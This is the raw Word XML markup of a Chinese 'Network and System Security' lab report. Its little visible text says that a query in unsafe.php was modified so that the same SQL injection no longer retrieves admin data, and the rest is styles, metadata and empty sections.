      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3830955" cy="1374775"/>
            <wp:effectExtent l="0" t="0" r="17145" b="15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A6EC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修改unsafe.php的查询语句部分如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0457EB2B">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5048250" cy="1314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7D4C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验证返现无法再用一样的手段通过注入攻击得到admin的信息了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3E9F81"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8120" cy="1743710"/>
            <wp:effectExtent l="0" t="0" r="1778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D947">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592EB730">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22946B8A"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二、遇到问题及解决方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43303DEC">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EFFF9A">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2858AE6B">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CEC51B"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三、对本次实验的建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B0CDAA">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDB4F66">
      <w:pPr>
        <w:ind w:firstLine="42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8492116"/>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="5EC37961">
        <w:pPr>
          <w:pStyle w:val="5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0C14583B"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1C767C"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21F1C4"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B0EF76">
    <w:pPr>
      <w:pStyle w:val="6"/>
      <w:ind w:firstLine="360"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>《网络与系统安全》实验报告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028C6E"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4D4C5C">
    <w:pPr>
      <w:ind w:left="480"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DF"/>
    <w:rsid w:val="00051DF1"/>
    <w:rsid w:val="001244CE"/>
    <w:rsid w:val="00171707"/>
    <w:rsid w:val="001A4DD2"/>
    <w:rsid w:val="003100AD"/>
    <w:rsid w:val="003F0DD0"/>
    <w:rsid w:val="004D5934"/>
    <w:rsid w:val="00651F07"/>
    <w:rsid w:val="006733A9"/>
    <w:rsid w:val="006D4CFB"/>
    <w:rsid w:val="007748C2"/>
    <w:rsid w:val="0078004D"/>
    <w:rsid w:val="00804C74"/>
    <w:rsid w:val="00877158"/>
    <w:rsid w:val="008B16CA"/>
    <w:rsid w:val="008B2B8A"/>
    <w:rsid w:val="008B7461"/>
    <w:rsid w:val="008E49C5"/>
    <w:rsid w:val="008F0317"/>
    <w:rsid w:val="0096156D"/>
    <w:rsid w:val="00975FDF"/>
    <w:rsid w:val="009D5EA1"/>
    <w:rsid w:val="00A00A34"/>
    <w:rsid w:val="00A8475D"/>
    <w:rsid w:val="00B14998"/>
    <w:rsid w:val="00B33A17"/>
    <w:rsid w:val="00BB4306"/>
    <w:rsid w:val="00BD6D65"/>
    <w:rsid w:val="00BE244F"/>
    <w:rsid w:val="00C86642"/>
    <w:rsid w:val="00C9411E"/>
    <w:rsid w:val="00CB3E8C"/>
    <w:rsid w:val="00E4758E"/>
    <w:rsid w:val="00EC7431"/>
    <w:rsid w:val="00FE750F"/>
    <w:rsid w:val="05305791"/>
    <w:rsid w:val="053E6F8E"/>
    <w:rsid w:val="0591547A"/>
    <w:rsid w:val="07070CE0"/>
    <w:rsid w:val="071C1AB9"/>
    <w:rsid w:val="09993566"/>
    <w:rsid w:val="0AD42521"/>
    <w:rsid w:val="0BA731C6"/>
    <w:rsid w:val="10D51608"/>
    <w:rsid w:val="118A0FD0"/>
    <w:rsid w:val="122A0394"/>
    <w:rsid w:val="15AE3900"/>
    <w:rsid w:val="18725A29"/>
    <w:rsid w:val="188C7DF8"/>
    <w:rsid w:val="1C326E0B"/>
    <w:rsid w:val="1E025791"/>
    <w:rsid w:val="1FB373E9"/>
    <w:rsid w:val="27827560"/>
    <w:rsid w:val="27F5401C"/>
    <w:rsid w:val="31152915"/>
    <w:rsid w:val="34984755"/>
    <w:rsid w:val="38F165F8"/>
    <w:rsid w:val="3AA6541B"/>
    <w:rsid w:val="3DB136C3"/>
    <w:rsid w:val="3F2C5906"/>
    <w:rsid w:val="451E70F3"/>
    <w:rsid w:val="47760556"/>
    <w:rsid w:val="48F92C46"/>
    <w:rsid w:val="4A894AE1"/>
    <w:rsid w:val="4A8B6AF7"/>
    <w:rsid w:val="4C5216C4"/>
    <w:rsid w:val="4CAA55D5"/>
    <w:rsid w:val="4F5C03C2"/>
    <w:rsid w:val="523F1387"/>
    <w:rsid w:val="53B67427"/>
    <w:rsid w:val="549037F2"/>
    <w:rsid w:val="55BA3C34"/>
    <w:rsid w:val="5DA546AF"/>
    <w:rsid w:val="5E8F1076"/>
    <w:rsid w:val="5EE05174"/>
    <w:rsid w:val="5FCF5B58"/>
    <w:rsid w:val="636E32B1"/>
    <w:rsid w:val="656C3DE9"/>
    <w:rsid w:val="66146A07"/>
    <w:rsid w:val="67727B56"/>
    <w:rsid w:val="68785E71"/>
    <w:rsid w:val="689520A9"/>
    <w:rsid w:val="6A1D1B56"/>
    <w:rsid w:val="6E2B2A93"/>
    <w:rsid w:val="6F8E6C94"/>
    <w:rsid w:val="70A049F5"/>
    <w:rsid w:val="71A51882"/>
    <w:rsid w:val="73F3740F"/>
    <w:rsid w:val="7761179F"/>
    <w:rsid w:val="7BAE00F8"/>
    <w:rsid w:val="7EB2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4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3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9">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="3"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="3"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="无间隔1"/>
    <w:link w:val="1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2">
    <w:name w:val="无间隔 Char"/>
    <w:basedOn w:val="3"/>
    <w:link w:val="11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glossaryDocument" Target="glossary/document.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml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6413A42EFF84760B6ED45128BFB8E4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9483DF-CEBC-43F3-829A-EDFF02D5996E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w14:paraId="03AFCFF5"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40E78F683E0847A5BD761921B662638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F57759-54DD-42E8-BBDE-FF474075FFE5}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w14:paraId="4AB2AF31"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F4444EE8D6146BCB0E6B5A747D0047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BE6766-C761-49FF-BF9F-30F6EE8AF819}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w14:paraId="523791F2">
          <w:pPr>
            <w:pStyle w:val="6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CF"/>
    <w:rsid w:val="0011755F"/>
    <w:rsid w:val="00146824"/>
    <w:rsid w:val="0021216C"/>
    <w:rsid w:val="004626CF"/>
    <w:rsid w:val="004C75A0"/>
    <w:rsid w:val="005D2BF4"/>
    <w:rsid w:val="00876E98"/>
    <w:rsid w:val="00A332CF"/>
    <w:rsid w:val="00B60505"/>
    <w:rsid w:val="00C02131"/>
    <w:rsid w:val="00D90C13"/>
    <w:rsid w:val="00DB5277"/>
    <w:rsid w:val="00F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6413A42EFF84760B6ED45128BFB8E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40E78F683E0847A5BD761921B662638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6F4444EE8D6146BCB0E6B5A747D004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128</Words>
  <Characters>734</Characters>
  <Lines>6</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>24</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>861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2020-06-06T05:33:00Z</dcterms:created>
  <dc:creator>su ting</dc:creator>
  <cp:lastModifiedBy>lenovo</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-16T09:01:04Z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601A4B149CE64B1D8BEAA7083DE0568C_13</vt:lpwstr>
  </property>
</Properties>
</file>